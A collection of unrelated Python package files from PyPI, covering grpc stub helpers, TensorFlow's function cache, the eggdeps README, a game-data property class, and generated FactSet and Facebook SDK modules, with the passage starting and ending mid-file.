The returned module object corresponds to the _pb2_grpc.py file generated
by protoc. The path is expected to be relative to an entry on sys.path
and all transitive dependencies of the file should also be resolveable
from an entry on sys.path.
To completely disable the machinery behind this function, set the
GRPC_PYTHON_DISABLE_DYNAMIC_STUBS environment variable to "true".
Args:
protobuf_path: The path to the .proto file on the filesystem. This path
must be resolveable from an entry on sys.path and so must all of its
transitive dependencies.
Returns:
A module object corresponding to the stub/service code for the indicated
.proto file. Equivalent to a generated _pb2_grpc.py file.
"""
return _call_with_lazy_import("services", protobuf_path)
def protos_and_services(protobuf_path): # pylint: disable=unused-argument
"""Returns a 2-tuple of modules corresponding to protos and services.
THIS IS AN EXPERIMENTAL API.
The return value of this function is equivalent to a call to protos and a
call to services.
To completely disable the machinery behind this function, set the
GRPC_PYTHON_DISABLE_DYNAMIC_STUBS environment variable to "true".
Args:
protobuf_path: The path to the .proto file on the filesystem. This path
must be resolveable from an entry on sys.path and so must all of its
transitive dependencies.
Returns:
A 2-tuple of module objects corresponding to (protos(path), services(path)).
"""
return _call_with_lazy_import("protos_and_services", protobuf_path)
|
PypiClean
|
/tensorflow_rocm-2.12.0.560-cp310-cp310-manylinux2014_x86_64.whl/tensorflow/core/function/polymorphism/function_cache.py
|
"""Cache to manage concrete functions and their signatures."""
import collections
from typing import Any, NamedTuple, Optional
from tensorflow.core.function import trace_type
from tensorflow.core.function.polymorphism import function_type as function_type_lib
from tensorflow.core.function.polymorphism import type_dispatch
# TODO(b/182990542): Enable and remove flag when stable.
DELETE_WITH_WEAKREF = False
class FunctionContext(NamedTuple):
"""Contains information regarding tf.function execution context."""
context: Any
class FunctionCache:
"""A container for managing concrete functions."""
__slots__ = ["_primary", "_dispatch_dict", "_garbage_collectors"]
def __init__(self):
# Maps (FunctionContext, FunctionType) to a concrete function.
self._primary = collections.OrderedDict()
# Maps FunctionContext to a TypeDispatchTable containing FunctionTypes of
# that particular context.
self._dispatch_dict = {}
def lookup(self, context: FunctionContext,
function_type: function_type_lib.FunctionType) -> Optional[Any]:
"""Looks up a concrete function based on the context and type."""
if context in self._dispatch_dict:
dispatch_type = self._dispatch_dict[context].dispatch(function_type)
if dispatch_type:
return self._primary[(context, dispatch_type)]
return None
def delete(self, context: FunctionContext,
function_type: function_type_lib.FunctionType) -> bool:
"""Deletes a concrete function given the context and type."""
if (context, function_type) not in self._primary:
return False
del self._primary[(context, function_type)]
self._dispatch_dict[context].delete(function_type)
return True
def add(self, context: FunctionContext,
function_type: function_type_lib.FunctionType,
deletion_observer: trace_type.WeakrefDeletionObserver,
concrete_fn: Any):
"""Adds a new concrete function alongside its key.
Args:
context: A FunctionContext representing the current context.
function_type: A FunctionType representing concrete_fn signature.
deletion_observer: A WeakrefDeletionObserver for the concrete_fn validity.
concrete_fn: The concrete function to be added to the cache.
"""
self._primary[(context, function_type)] = concrete_fn
if context not in self._dispatch_dict:
self._dispatch_dict[context] = type_dispatch.TypeDispatchTable()
self._dispatch_dict[context].add_target(function_type)
listener_fn = (lambda: self.delete(context, function_type)
) if DELETE_WITH_WEAKREF else lambda: None
deletion_observer.add_listener(listener_fn)
def generalize(
self, context: FunctionContext,
function_type: function_type_lib.FunctionType
) -> function_type_lib.FunctionType:
"""Try to generalize a FunctionType within a FunctionContext."""
if context in self._dispatch_dict:
return self._dispatch_dict[context].try_generalizing_function_type(
function_type)
else:
return function_type
# TODO(b/205971333): Remove this function.
def clear(self):
"""Removes all concrete functions from the cache."""
self._primary.clear()
self._dispatch_dict.clear()
def values(self):
"""Returns a list of all `ConcreteFunction` instances held by this cache."""
return list(self._primary.values())
|
PypiClean
|
/tl.eggdeps-1.0.tar.gz/tl.eggdeps-1.0/README.rst
|
==========
tl.eggdeps
==========
The ``eggdeps`` tool reports dependencies between eggs in the working set.
Dependencies are considered recursively, creating a directed graph. This graph
is printed to standard output either as plain text, or as an input file to the
graphviz tools.
Usage
=====
``eggdeps [options] [specifications]``
Specifications must follow the usual syntax for specifying distributions of
Python packages as defined by ``pkg_resources``.
- If any specifications are given, the corresponding distributions will make
up the roots of the dependency graph, and the graph will be restricted to
their dependencies.
- If no specifications are given, the graph will map the possible dependencies
between all eggs in the working set and its roots will be those
distributions that aren't dependencies of any other distributions.
Options
-------
-h, --help show this help message and exit
-i IGNORE, --ignore=IGNORE
project names to ignore
-I RE_IGNORE, --re-ignore=RE_IGNORE
regular expression for project names to ignore
-e DEAD_ENDS, --dead-end=DEAD_ENDS
names of projects whose dependencies to ignore
-E RE_DEAD_ENDS, --re-dead-end=RE_DEAD_ENDS
regular expression for project names whose
dependencies to ignore
-x, --no-extras always omit extra dependencies
-n, --version-numbers print version numbers of active distributions
-1, --once in plain text output, include each distribution only
once
-t, --terse in plain text output, omit any hints at unprinted
distributions, such as ellipses
-d, --dot produce a dot graph
-c, --cluster in a dot graph, cluster direct dependencies of each
root distribution
-r, --requirements produce a requirements list
-s, --version-specs in a requirements list, print loosest possible version
specifications
The ``-i``, ``-I``, ``-e``, and ``-E`` options may occur multiple times.
If both the ``-d`` and ``-r`` options are given, the one listed last wins.
When printing requirements lists, ``-v`` wins over ``-s``.
The script entry point recognizes default values for all options, the variable
names being the long option names with any dashes replaced by underscores
(except for ``--no-extras``, which translates to setting ``extras=False``).
This allows for setting defaults using the ``arguments`` option of the egg
recipe in a buildout configuration, for example.
Details
=======
The goal of ``eggdeps`` is to compute a directed dependency graph with nodes
that represent egg distributions from the working set, and edges which
represent either mandatory or extra dependencies between the eggs.
Working set
-----------
The working set ``eggdeps`` operates on is defined by the egg distributions
available to the running Python interpreter. For example, these may be the
distributions activated by ``easy_install`` or installed in a ``zc.buildout``
environment.
If the graph is to be calculated to such specifications that not all required
distributions are in the working set, the missing ones will be marked in the
output, and their dependencies cannot be determined. The same happens if any
distribution that is either specified on the command line or required by any
other distribution is available in the working set, but at a version
incompatible with the specified requirement.
Graph building strategies
-------------------------
The dependency graph may be built following either of two strategies:
:Analysing the whole working set:
Nodes correspond exactly to the distributions in the working set. Edges
corresponding to all conceivable dependencies between any active
distributions are included, but only if the required distribution is active
at the correct version. The roots of the graph correspond to those
distributions no other active distributions depend upon.
:Starting from one or more eggs:
Nodes include all packages depended upon by the specified distributions and
extras, as well as their deep dependencies. They may cover only part of the
working set, as well as include nodes for distributions that are not active
at the required versions or not active at all (so their dependencies can not
be followed). The roots of the graph correspond to the specified
distributions.
Some information will be lost while building the graph:
- If a dependency occurs both mandatorily and by way of one or more extras, it
will be recorded as a plain mandatory dependency.
- If a distribution A with installed extras is a dependency of multiple other
distributions, they will all appear to depend on A with all its required
extras, even if they individually require none or only a few of them.
Reducing the graph
------------------
In order to reduce an otherwise big and tangled dependency graph, certain
nodes and edges may be omitted.
:Ignored nodes:
Nodes may be ignored completely by exact name or regular expression
matching. This is useful if a very basic distribution is a depedency of a
lot of others. An example might be ``setuptools``.
:Dead ends:
Distributions may be declared dead ends by exact name or regular expression
matching. Dead ends are included in the graph but their own dependencies
will be ignored. This allows for large subsystems of distributions to be
blotted out except for their "entry points". As an example, one might
declare ``zope.app.*`` dead ends in the context of ``zope.*`` packages.
:No extras:
Reporting and following extra dependencies may be switched off completely.
This will probably make most sense when analysing the working set rather
than the dependencies of specified distributions.
Output
------
There are two ways ``eggdeps`` can output the computed dependency graph: plain
text (the default) and a dot file to be fed to the graphviz tools.
Plain text output
~~~~~~~~~~~~~~~~~
The graph is printed to standard output essentially one node per line,
indented according to nesting depth, and annotated where appropriate. The
dependencies of each node are sorted after the following criteria:
- Mandatory dependencies are printed before extra requirements.
- Dependencies of each set of extras are grouped, the groups being sorted
alphabetically by the names of the extras.
- Dependencies which are either all mandatory or by way of the same set of
extras are sorted alphabetically by name.
As an illustrating example, the following dependency graph was computed for
two Zope packages, one of them required with a "test" extra depending on an
uninstalled egg, and some graph reduction applied::
zope.annotation
zope.app.container *
zope.component
zope.deferredimport
zope.proxy
zope.deprecation
zope.event
zope.dublincore
zope.annotation ...
[test]
(zope.app.testing) *
:Brackets []:
If one or more dependencies of a node are due to extra requirements only,
the names of those extras are printed in square brackets above their
dependencies, half-indented relative to the node which requires them.
:Ellipsis ...:
If a node with further dependencies occurs at several places in the graph,
the subgraph is printed only once, the other occurences being marked by an
ellipsis. The place where the subgraph is printed is chosen such that
* extra dependencies occur as late as possible in the path, if at all,
* shallow nesting is preferred,
* paths early in the alphabet are preferred.
:Parentheses ():
If a distribution is not in the working set, its name is parenthesised.
:Asterisk *:
Dead ends are marked by an asterisk.
Dot file output
~~~~~~~~~~~~~~~
In a dot graphics, nodes and edges are not annotated with text but colored.
These are the color codes for nodes, later ones overriding earlier ones in
cases where more than one color is appropriate:
:Green:
Nodes corresponding to the roots of the graph.
:Yellow:
Direct dependencies of any root nodes, whether mandatory or through extras.
:Lightgrey:
Dead ends.
:Red:
Nodes for eggs installed at a version incompatible with some requirement, or
not installed at all.
Edge colors:
:Black:
Mandatory dependencies.
:Lightgrey:
Extra dependencies.
Other than being highlighted by color, root nodes and their direct
dependencies may be clustered. ``eggdeps`` tries to put each root node in its
own cluster. However, if two or more root nodes share any direct dependencies,
they will share a cluster as well.
Requirements list
~~~~~~~~~~~~~~~~~
All the distributions included in the graph may be output as the Python
representation of a list of requirement specifications, either
- listing bare package names,
- including the exact versions as they occur in the working set, or
- specifying complex version requirements that take into account all version
requirements made for the distribution in question (but disregard extras
completely for the time being). Complex version requirements always require
at least the version that occurs in the working set, assuming that we cannot
know the version requirements of past versions but reasonably assume that
requirements might stay the same for future versions.
The list is sorted alphabetically by distribution name.
.. Local Variables:
.. mode: rst
.. End:
|
PypiClean
|
/retro_data_structures-0.23.0-py3-none-any.whl/retro_data_structures/properties/dkc_returns/archetypes/ZoomBehaviorData.py
|
import dataclasses
import struct
import typing
from retro_data_structures.game_check import Game
from retro_data_structures.properties.base_property import BaseProperty
import retro_data_structures.enums.dkc_returns as enums
from retro_data_structures.properties.dkc_returns.archetypes.Convergence import Convergence
from retro_data_structures.properties.dkc_returns.core.Spline import Spline
@dataclasses.dataclass()
class ZoomBehaviorData(BaseProperty):
pullback_spline: Spline = dataclasses.field(default_factory=Spline)
zoom_by_horizontal_distance: bool = dataclasses.field(default=True)
zoom_by_vertical_distance: bool = dataclasses.field(default=False)
vertical_distance_ratio: float = dataclasses.field(default=1.7769999504089355)
zoom_by_distance_from_ground: bool = dataclasses.field(default=False)
pullback_spline_from_ground: Spline = dataclasses.field(default_factory=Spline)
adjust_horizontally: bool = dataclasses.field(default=True)
adjust_vertically: bool = dataclasses.field(default=True)
zoom_in_delay: float = dataclasses.field(default=1.5)
zoom_motion: Convergence = dataclasses.field(default_factory=Convergence)
horizontal_adjust_motion: Convergence = dataclasses.field(default_factory=Convergence)
get_max_zoom_from_zoom_spline: bool = dataclasses.field(default=False)
max_distance_from_target: float = dataclasses.field(default=30.5)
@classmethod
def game(cls) -> Game:
return Game.DKC_RETURNS
@classmethod
def from_stream(cls, data: typing.BinaryIO, size: typing.Optional[int] = None, default_override: typing.Optional[dict] = None):
property_count = struct.unpack(">H", data.read(2))[0]
present_fields = default_override or {}
for _ in range(property_count):
property_id, property_size = struct.unpack(">LH", data.read(6))
start = data.tell()
try:
property_name, decoder = _property_decoder[property_id]
present_fields[property_name] = decoder(data, property_size)
except KeyError:
raise RuntimeError(f"Unknown property: 0x{property_id:08x}")
assert data.tell() - start == property_size
return cls(**present_fields)
def to_stream(self, data: typing.BinaryIO, default_override: typing.Optional[dict] = None):
default_override = default_override or {}
data.write(b'\x00\r') # 13 properties
data.write(b'4:\x18\xa7') # 0x343a18a7
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.pullback_spline.to_stream(data)
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b'\x82\xaf7\x1e') # 0x82af371e
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.zoom_by_horizontal_distance))
data.write(b'ov\xec^') # 0x6f76ec5e
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.zoom_by_vertical_distance))
data.write(b'm\x18\xc3\x18') # 0x6d18c318
data.write(b'\x00\x04') # size
data.write(struct.pack('>f', self.vertical_distance_ratio))
data.write(b'\xac\xe2:\xc6') # 0xace23ac6
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.zoom_by_distance_from_ground))
data.write(b'-\x83\x9eo') # 0x2d839e6f
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.pullback_spline_from_ground.to_stream(data)
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b'\xf8\x8d~\xf2') # 0xf88d7ef2
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.adjust_horizontally))
data.write(b'\x90n\x98\xfa') # 0x906e98fa
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.adjust_vertically))
data.write(b'\rl\x95)') # 0xd6c9529
data.write(b'\x00\x04') # size
data.write(struct.pack('>f', self.zoom_in_delay))
data.write(b'\t/\x7f\xd8') # 0x92f7fd8
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.zoom_motion.to_stream(data, default_override={'convergence_type': enums.ConvergenceType.Unknown1})
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b')\xe0b\x13') # 0x29e06213
before = data.tell()
data.write(b'\x00\x00') # size placeholder
self.horizontal_adjust_motion.to_stream(data)
after = data.tell()
data.seek(before)
data.write(struct.pack(">H", after - before - 2))
data.seek(after)
data.write(b'\xb2\x1eg\xc8') # 0xb21e67c8
data.write(b'\x00\x01') # size
data.write(struct.pack('>?', self.get_max_zoom_from_zoom_spline))
data.write(b'\x05O\x1a\x14') # 0x54f1a14
data.write(b'\x00\x04') # size
data.write(struct.pack('>f', self.max_distance_from_target))
@classmethod
def from_json(cls, data: dict):
return cls(
pullback_spline=Spline.from_json(data['pullback_spline']),
zoom_by_horizontal_distance=data['zoom_by_horizontal_distance'],
zoom_by_vertical_distance=data['zoom_by_vertical_distance'],
vertical_distance_ratio=data['vertical_distance_ratio'],
zoom_by_distance_from_ground=data['zoom_by_distance_from_ground'],
pullback_spline_from_ground=Spline.from_json(data['pullback_spline_from_ground']),
adjust_horizontally=data['adjust_horizontally'],
adjust_vertically=data['adjust_vertically'],
zoom_in_delay=data['zoom_in_delay'],
zoom_motion=Convergence.from_json(data['zoom_motion']),
horizontal_adjust_motion=Convergence.from_json(data['horizontal_adjust_motion']),
get_max_zoom_from_zoom_spline=data['get_max_zoom_from_zoom_spline'],
max_distance_from_target=data['max_distance_from_target'],
)
def to_json(self) -> dict:
return {
'pullback_spline': self.pullback_spline.to_json(),
'zoom_by_horizontal_distance': self.zoom_by_horizontal_distance,
'zoom_by_vertical_distance': self.zoom_by_vertical_distance,
'vertical_distance_ratio': self.vertical_distance_ratio,
'zoom_by_distance_from_ground': self.zoom_by_distance_from_ground,
'pullback_spline_from_ground': self.pullback_spline_from_ground.to_json(),
'adjust_horizontally': self.adjust_horizontally,
'adjust_vertically': self.adjust_vertically,
'zoom_in_delay': self.zoom_in_delay,
'zoom_motion': self.zoom_motion.to_json(),
'horizontal_adjust_motion': self.horizontal_adjust_motion.to_json(),
'get_max_zoom_from_zoom_spline': self.get_max_zoom_from_zoom_spline,
'max_distance_from_target': self.max_distance_from_target,
}
def _decode_pullback_spline(data: typing.BinaryIO, property_size: int):
return Spline.from_stream(data, property_size)
def _decode_zoom_by_horizontal_distance(data: typing.BinaryIO, property_size: int):
return struct.unpack('>?', data.read(1))[0]
def _decode_zoom_by_vertical_distance(data: typing.BinaryIO, property_size: int):
return struct.unpack('>?', data.read(1))[0]
def _decode_vertical_distance_ratio(data: typing.BinaryIO, property_size: int):
return struct.unpack('>f', data.read(4))[0]
def _decode_zoom_by_distance_from_ground(data: typing.BinaryIO, property_size: int):
return struct.unpack('>?', data.read(1))[0]
def _decode_pullback_spline_from_ground(data: typing.BinaryIO, property_size: int):
return Spline.from_stream(data, property_size)
def _decode_adjust_horizontally(data: typing.BinaryIO, property_size: int):
return struct.unpack('>?', data.read(1))[0]
def _decode_adjust_vertically(data: typing.BinaryIO, property_size: int):
return struct.unpack('>?', data.read(1))[0]
def _decode_zoom_in_delay(data: typing.BinaryIO, property_size: int):
return struct.unpack('>f', data.read(4))[0]
def _decode_zoom_motion(data: typing.BinaryIO, property_size: int):
return Convergence.from_stream(data, property_size, default_override={'convergence_type': enums.ConvergenceType.Unknown1})
def _decode_horizontal_adjust_motion(data: typing.BinaryIO, property_size: int):
return Convergence.from_stream(data, property_size)
def _decode_get_max_zoom_from_zoom_spline(data: typing.BinaryIO, property_size: int):
return struct.unpack('>?', data.read(1))[0]
def _decode_max_distance_from_target(data: typing.BinaryIO, property_size: int):
return struct.unpack('>f', data.read(4))[0]
_property_decoder: typing.Dict[int, typing.Tuple[str, typing.Callable[[typing.BinaryIO, int], typing.Any]]] = {
0x343a18a7: ('pullback_spline', _decode_pullback_spline),
0x82af371e: ('zoom_by_horizontal_distance', _decode_zoom_by_horizontal_distance),
0x6f76ec5e: ('zoom_by_vertical_distance', _decode_zoom_by_vertical_distance),
0x6d18c318: ('vertical_distance_ratio', _decode_vertical_distance_ratio),
0xace23ac6: ('zoom_by_distance_from_ground', _decode_zoom_by_distance_from_ground),
0x2d839e6f: ('pullback_spline_from_ground', _decode_pullback_spline_from_ground),
0xf88d7ef2: ('adjust_horizontally', _decode_adjust_horizontally),
0x906e98fa: ('adjust_vertically', _decode_adjust_vertically),
0xd6c9529: ('zoom_in_delay', _decode_zoom_in_delay),
0x92f7fd8: ('zoom_motion', _decode_zoom_motion),
0x29e06213: ('horizontal_adjust_motion', _decode_horizontal_adjust_motion),
0xb21e67c8: ('get_max_zoom_from_zoom_spline', _decode_get_max_zoom_from_zoom_spline),
0x54f1a14: ('max_distance_from_target', _decode_max_distance_from_target),
}
|
PypiClean
|
/fds.sdk.FactSetEstimates-1.1.1-py3-none-any.whl/fds/sdk/FactSetEstimates/models/__init__.py
|
# import all models into this package
# if you have many models here with many references from one model to another this may
# raise a RecursionError
# to avoid this, import only the models that you directly need like:
# from from fds.sdk.FactSetEstimates.model.pet import Pet
# or import this package, but before doing it, use:
# import sys
# sys.setrecursionlimit(n)
from fds.sdk.FactSetEstimates.model.category import Category
from fds.sdk.FactSetEstimates.model.consensus_estimate import ConsensusEstimate
from fds.sdk.FactSetEstimates.model.consensus_ratings import ConsensusRatings
from fds.sdk.FactSetEstimates.model.consensus_ratings_request import ConsensusRatingsRequest
from fds.sdk.FactSetEstimates.model.consensus_ratings_response import ConsensusRatingsResponse
from fds.sdk.FactSetEstimates.model.consensus_response import ConsensusResponse
from fds.sdk.FactSetEstimates.model.detail_estimate import DetailEstimate
from fds.sdk.FactSetEstimates.model.detail_ratings import DetailRatings
from fds.sdk.FactSetEstimates.model.detail_ratings_request import DetailRatingsRequest
from fds.sdk.FactSetEstimates.model.detail_ratings_response import DetailRatingsResponse
from fds.sdk.FactSetEstimates.model.detail_response import DetailResponse
from fds.sdk.FactSetEstimates.model.error_response import ErrorResponse
from fds.sdk.FactSetEstimates.model.error_response_sub_errors import ErrorResponseSubErrors
from fds.sdk.FactSetEstimates.model.fixed_consensus_request import FixedConsensusRequest
from fds.sdk.FactSetEstimates.model.fixed_detail_request import FixedDetailRequest
from fds.sdk.FactSetEstimates.model.frequency import Frequency
from fds.sdk.FactSetEstimates.model.ids import Ids
from fds.sdk.FactSetEstimates.model.metric import Metric
from fds.sdk.FactSetEstimates.model.metrics import Metrics
from fds.sdk.FactSetEstimates.model.metrics_request import MetricsRequest
from fds.sdk.FactSetEstimates.model.metrics_response import MetricsResponse
from fds.sdk.FactSetEstimates.model.periodicity import Periodicity
from fds.sdk.FactSetEstimates.model.periodicity_detail import PeriodicityDetail
from fds.sdk.FactSetEstimates.model.periodicity_surprise import PeriodicitySurprise
from fds.sdk.FactSetEstimates.model.rolling_consensus_request import RollingConsensusRequest
from fds.sdk.FactSetEstimates.model.rolling_detail_request import RollingDetailRequest
from fds.sdk.FactSetEstimates.model.segment_ids import SegmentIds
from fds.sdk.FactSetEstimates.model.segment_type import SegmentType
from fds.sdk.FactSetEstimates.model.segments_estimate import SegmentsEstimate
from fds.sdk.FactSetEstimates.model.segments_request import SegmentsRequest
from fds.sdk.FactSetEstimates.model.segments_response import SegmentsResponse
from fds.sdk.FactSetEstimates.model.statistic import Statistic
from fds.sdk.FactSetEstimates.model.subcategory import Subcategory
from fds.sdk.FactSetEstimates.model.surprise import Surprise
from fds.sdk.FactSetEstimates.model.surprise_request import SurpriseRequest
from fds.sdk.FactSetEstimates.model.surprise_response import SurpriseResponse
|
PypiClean
|
/trackian-homebew-facebook-business-14.0.0.tar.gz/trackian-homebew-facebook-business-14.0.0/facebook_business/adobjects/pagecalltoaction.py
|
# You are hereby granted a non-exclusive, worldwide, royalty-free license to
# use, copy, modify, and distribute this software in source code or binary
# form for use in connection with the web services and APIs provided by
# Facebook.
# As with any software that integrates with the Facebook platform, your use
# of this software is subject to the Facebook Developer Principles and
# Policies [http://developers.facebook.com/policy/]. This copyright notice
# shall be included in all copies or substantial portions of the software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
from facebook_business.adobjects.abstractobject import AbstractObject
from facebook_business.adobjects.abstractcrudobject import AbstractCrudObject
from facebook_business.adobjects.objectparser import ObjectParser
from facebook_business.api import FacebookRequest
from facebook_business.typechecker import TypeChecker
"""
This class is auto-generated.
For any issues or feature requests related to this class, please let us know on
github and we'll fix in our codegen framework. We'll not be able to accept
pull request for this class.
"""
class PageCallToAction(
AbstractCrudObject,
):
def __init__(self, fbid=None, parent_id=None, api=None):
self._isPageCallToAction = True
super(PageCallToAction, self).__init__(fbid, parent_id, api)
class Field(AbstractObject.Field):
android_app = 'android_app'
android_deeplink = 'android_deeplink'
android_destination_type = 'android_destination_type'
android_package_name = 'android_package_name'
android_url = 'android_url'
created_time = 'created_time'
email_address = 'email_address'
field_from = 'from'
id = 'id'
intl_number_with_plus = 'intl_number_with_plus'
iphone_app = 'iphone_app'
iphone_deeplink = 'iphone_deeplink'
iphone_destination_type = 'iphone_destination_type'
iphone_url = 'iphone_url'
status = 'status'
type = 'type'
updated_time = 'updated_time'
web_destination_type = 'web_destination_type'
web_url = 'web_url'
class AndroidDestinationType:
app_deeplink = 'APP_DEEPLINK'
become_a_volunteer = 'BECOME_A_VOLUNTEER'
email = 'EMAIL'
facebook_app = 'FACEBOOK_APP'
follow = 'FOLLOW'
marketplace_inventory_page = 'MARKETPLACE_INVENTORY_PAGE'
menu_on_facebook = 'MENU_ON_FACEBOOK'
messenger = 'MESSENGER'
mini_shop = 'MINI_SHOP'
mobile_center = 'MOBILE_CENTER'
none = 'NONE'
phone_call = 'PHONE_CALL'
shop_on_facebook = 'SHOP_ON_FACEBOOK'
website = 'WEBSITE'
class IphoneDestinationType:
app_deeplink = 'APP_DEEPLINK'
become_a_volunteer = 'BECOME_A_VOLUNTEER'
email = 'EMAIL'
facebook_app = 'FACEBOOK_APP'
follow = 'FOLLOW'
marketplace_inventory_page = 'MARKETPLACE_INVENTORY_PAGE'
menu_on_facebook = 'MENU_ON_FACEBOOK'
messenger = 'MESSENGER'
mini_shop = 'MINI_SHOP'
none = 'NONE'
phone_call = 'PHONE_CALL'
shop_on_facebook = 'SHOP_ON_FACEBOOK'
website = 'WEBSITE'
class Type:
become_a_volunteer = 'BECOME_A_VOLUNTEER'
book_appointment = 'BOOK_APPOINTMENT'
book_now = 'BOOK_NOW'
buy_tickets = 'BUY_TICKETS'
call_now = 'CALL_NOW'
charity_donate = 'CHARITY_DONATE'
contact_us = 'CONTACT_US'
donate_now = 'DONATE_NOW'
email = 'EMAIL'
follow_page = 'FOLLOW_PAGE'
get_directions = 'GET_DIRECTIONS'
get_offer = 'GET_OFFER'
get_offer_view = 'GET_OFFER_VIEW'
interested = 'INTERESTED'
learn_more = 'LEARN_MORE'
listen = 'LISTEN'
local_dev_platform = 'LOCAL_DEV_PLATFORM'
message = 'MESSAGE'
mobile_center = 'MOBILE_CENTER'
open_app = 'OPEN_APP'
order_food = 'ORDER_FOOD'
play_music = 'PLAY_MUSIC'
play_now = 'PLAY_NOW'
purchase_gift_cards = 'PURCHASE_GIFT_CARDS'
request_appointment = 'REQUEST_APPOINTMENT'
request_quote = 'REQUEST_QUOTE'
shop_now = 'SHOP_NOW'
shop_on_facebook = 'SHOP_ON_FACEBOOK'
sign_up = 'SIGN_UP'
view_inventory = 'VIEW_INVENTORY'
view_menu = 'VIEW_MENU'
view_shop = 'VIEW_SHOP'
visit_group = 'VISIT_GROUP'
watch_now = 'WATCH_NOW'
woodhenge_support = 'WOODHENGE_SUPPORT'
class WebDestinationType:
become_a_volunteer = 'BECOME_A_VOLUNTEER'
become_supporter = 'BECOME_SUPPORTER'
email = 'EMAIL'
follow = 'FOLLOW'
messenger = 'MESSENGER'
mobile_center = 'MOBILE_CENTER'
none = 'NONE'
shop_on_facebook = 'SHOP_ON_FACEBOOK'
website = 'WEBSITE'
def api_delete(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
from facebook_business.utils import api_utils
if batch is None and (success is not None or failure is not None):
api_utils.warning('`success` and `failure` callback only work for batch call.')
param_types = {
}
enums = {
}
request = FacebookRequest(
node_id=self['id'],
method='DELETE',
endpoint='/',
api=self._api,
param_checker=TypeChecker(param_types, enums),
target_class=AbstractCrudObject,
api_type='NODE',
response_parser=ObjectParser(reuse_object=self),
)
request.add_params(params)
request.add_fields(fields)
if batch is not None:
request.add_to_batch(batch, success=success, failure=failure)
return request
elif pending:
return request
else:
self.assure_call()
return request.execute()
def api_get(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
from facebook_business.utils import api_utils
if batch is None and (success is not None or failure is not None):
api_utils.warning('`success` and `failure` callback only work for batch call.')
param_types = {
}
enums = {
}
request = FacebookRequest(
node_id=self['id'],
method='GET',
endpoint='/',
api=self._api,
param_checker=TypeChecker(param_types, enums),
target_class=PageCallToAction,
api_type='NODE',
response_parser=ObjectParser(reuse_object=self),
)
request.add_params(params)
request.add_fields(fields)
if batch is not None:
request.add_to_batch(batch, success=success, failure=failure)
return request
elif pending:
return request
else:
self.assure_call()
return request.execute()
def api_update(self, fields=None, params=None, batch=None, success=None, failure=None, pending=False):
from facebook_business.utils import api_utils
if batch is None and (success is not None or failure is not None):
api_utils.warning('`success` and `failure` callback only work for batch call.')
param_types = {
'android_app_id': 'int',
'android_destination_type': 'android_destination_type_enum',
'android_package_name': 'string',
'android_url': 'string',
'email_address': 'string',
'intl_number_with_plus': 'string',
'iphone_app_id': 'int',
'iphone_destination_type': 'iphone_destination_type_enum',
'iphone_url': 'string',
'type': 'type_enum',
'web_destination_type': 'web_destination_type_enum',
'web_url': 'string',
}
enums = {
'android_destination_type_enum': PageCallToAction.AndroidDestinationType.__dict__.values(),
'iphone_destination_type_enum': PageCallToAction.IphoneDestinationType.__dict__.values(),
'type_enum': PageCallToAction.Type.__dict__.values(),
'web_destination_type_enum': PageCallToAction.WebDestinationType.__dict__.values(),
}
request = FacebookRequest(
node_id=self['id'],
method='POST',
endpoint='/',
api=self._api,
param_checker=TypeChecker(param_types, enums),
target_class=PageCallToAction,
api_type='NODE',
response_parser=ObjectParser(reuse_object=self),
)
request.add_params(params)
request.add_fields(fields)
if batch is not None:
request.add_to_batch(batch, success=success, failure=failure)
return request
elif pending:
return request
else:
self.assure_call()
return request.execute()
_field_types = {
'android_app': 'Application',
'android_deeplink': 'string',
'android_destination_type': 'string',
'android_package_name': 'string',
'android_url': 'string',
'created_time': 'datetime',
'email_address': 'string',
'from': 'Page',
'id': 'string',
'intl_number_with_plus': 'string',
'iphone_app': 'Application',
'iphone_deeplink': 'string',
'iphone_destination_type': 'string',
'iphone_url': 'string',
'status': 'string',
'type': 'string',
'updated_time': 'datetime',
'web_destination_type': 'string',
'web_url': 'string',
}
@classmethod
def _get_field_enum_info(cls):
field_enum_info = {}
field_enum_info['AndroidDestinationType'] = PageCallToAction.AndroidDestinationType.__dict__.values()
field_enum_info['IphoneDestinationType'] = PageCallToAction.IphoneDestinationType.__dict__.values()
field_enum_info['Type'] = PageCallToAction.Type.__dict__.values()
field_enum_info['WebDestinationType'] = PageCallToAction.WebDestinationType.__dict__.values()
return field_enum_info
|
PypiClean
|
/pymmcore_widgets-0.4.2-py3-none-any.whl/pymmcore_widgets/_group_preset_widget/_edit_group_widget.py
|
from __future__ import annotations
from pymmcore_plus import CMMCorePlus
from qtpy.QtWidgets import (
QDialog,
QGroupBox,
QHBoxLayout,
QLabel,
QLineEdit,
QPushButton,
QSizePolicy,
QVBoxLayout,
QWidget,
)
from pymmcore_widgets._device_property_table import DevicePropertyTable
from pymmcore_widgets._device_type_filter import DeviceTypeFilters
from pymmcore_widgets._util import block_core
class EditGroupWidget(QDialog):
"""Widget to edit the specified Group."""
def __init__(self, group: str, *, parent: QWidget | None = None) -> None:
super().__init__(parent=parent)
self._mmc = CMMCorePlus.instance()
self._group = group
if self._group not in self._mmc.getAvailableConfigGroups():
return
self._mmc.events.systemConfigurationLoaded.connect(self._update_filter)
self._create_gui()
